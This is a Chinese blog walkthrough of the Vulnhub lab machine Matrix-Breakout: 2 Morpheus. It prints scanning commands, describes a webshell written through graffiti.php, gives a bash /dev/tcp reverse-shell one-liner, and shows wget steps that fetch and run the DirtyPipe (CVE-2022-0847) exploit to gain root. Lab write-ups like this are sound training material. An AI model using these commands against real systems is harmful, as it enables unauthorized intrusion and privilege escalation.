Vulnhub: Matrix-Breakout: 2 Morpheus靶机

最新推荐文章于 2024-05-05 15:03:05 发布
最新推荐文章于 2024-05-05 15:03:05 发布
阅读量371 收藏
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/131148851
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

目录爆破

feroxbuster -k -d 1 --url http://192.168.111.130 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap -t 1 -e -C 404,500

graffiti.php页面的文本框输入内容会写入graffiti.txt

用burp改包写入webshell

反弹shell需要url编码后再执行

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

用linpeas.sh收集到目标存在CVE-2022-0847,exp地址:https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

利用过程

#kali开启http服务
python3 -m http.server
 ​
#目标上执行
wget http://192.168.111.111:8000/exploit.c
wget http://192.168.111.111:8000/compile.sh
chmod 777 compile.sh
./compile.sh
./exploit
su root         #root用户的密码被改为aaron

flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
matrix-breakout-2-morpheus靶机渗透笔记
qq_60600840的博客
08-09 391
matrix-breakout-2-morpheus靶机安全、渗透、靶机
breakout-game:突破-打破砖
04-29
突破游戏2018年7月
Vulnhub】之matrix-breakout-2-morpheus
zg_111的博客
03-29 1806
上传成功后,我们通过蚁剑连接成功,并且在根目录下找到了FLAG.txt文件,并在文件中发现了flag,提示要找到 cypher 的密码,还提示 80 端口有一个隐藏图片 /.cypher-neo.png。使用burpsuite工具抓包可知,message参数为上传的内容,file参数为内容传入的文件,改变file变量可以直接对靶机文件修改,能随意创建文件。根据扫描的结果发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131。让我们先来信息收集一波吧!
2024年【网络安全Vulnhub靶场之matrix-breakout-2-morpheus,2024年最新美团网络安全开发工程师岗位职能要求
最新发布
2401_84520215的博客
05-05 548
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。gobuster的效率相比于dirsearch来说更快,当字典过大的时候选择gobuster是一个不错的选择。因篇幅有限,仅展示部分资料。
Vulnhub靶机MATRIX-BREAKOUT_ 2 MORPHEUS
LainWith的博客
01-10 1474
(此系列共1台)发布日期:2022 年 7 月 11 日难度:中级运行环境:Virtualbox运行失败,VMware运行成功目标:取得 root 权限主机发现端口扫描+漏洞扫描ftp探测分析计划任务日志内核提权。
vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1223
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
vulnhub靶场渗透实战15-matrix-breakout-2-morpheus
随心所欲不逾矩
02-08 904
1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。3;遇到不是很懂的程序,投机取巧一下,利用漏洞提权。
zero-hm-10-xbee-breakout:HM-10 蓝牙低功耗 (BLE) 模块的 XBee 突破
06-24
概述这是 HM-10 蓝牙低功耗模块的 3.3V XBee 突破。执照知识共享共享和相同方式共享部分参考HM-10 购买: : 很棒的文章: : 开放硬件参考设计: https://github.com/SameA/Bluetooth_Low_Energy
DA14531MOD-Breakout:DA14531MOD-Breakout板
02-18
DA14531MOD-突破DA14531MOD-突破板
Pantsu-Breakout-Game:Phaser网络游戏
02-05
Pantsu突破游戏 移相器网页游戏 您可以在上播放最新的最低可行产品,或者在上播放最新版本... 因此,由于我不想重构当前编写的所有内容,因此我将停止Pantsu Breakout Game的开发,而将其保留在最低可行的产品编号5上。
breakout:突围-类似于Pong的街机游戏
04-05
爆发 突围-类似于Pong的街机游戏。
vulnhub靶场Matrix-Breakout 2 Morpheus渗透
weixin_52529261的博客
06-14 488
vulnhub打靶day1
vulnhub靶场Matrix-Breakout 2 Morpheus教程
m0_73248913的博客
01-22 3993
蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件。下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来。
Matrix Breakout:2 Morpheus靶机详细渗透测试过程记录)
m0_63028223的博客
07-12 616
php伪协议读文件,msf提权
vulnhub靶机渗透 matrix-breakout-2-morpheus
RestoreJustice的博客
03-19 457
webshell那一段,一开始以为是扫目录把靶机扫崩溃了,后来发现靶机有防火墙。之前一直写不了,可能是这个原因。
matrix-breakout-2-morpheus】靶场记录
weixin_46411728的博客
02-14 1142
matrix-breakout-2-morpheus】靶场记录
Matrix-Breakout-2-Morpheus靶机进行渗透测试
zll___的博客
03-27 701
Matrix-Breakout-2-Morpheus靶机进行渗透测试
Vulnhub靶机笔记2——matrix-breakout-2-morpheus
2301_76329510的博客
04-30 756
发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件。这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描。80端口发现两个重要文件test.php和robots.txt。使用CVE-2022-0847 DirtyPipe漏洞。发现可以输入的东西可以写入graffiti.txt。提权成功,这种方法虽然快,但是显得太简单。检测到一个cve-2022-0847漏洞。发现存在CVE-2022-0847漏洞。访问graffiti.txt。
vulnhub靶场之Matrix-Breakout 2 Morpheus
qq_58091216的博客
01-31 1231
我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell。截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行。
vulnhub靶场 breakout
08-29
chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值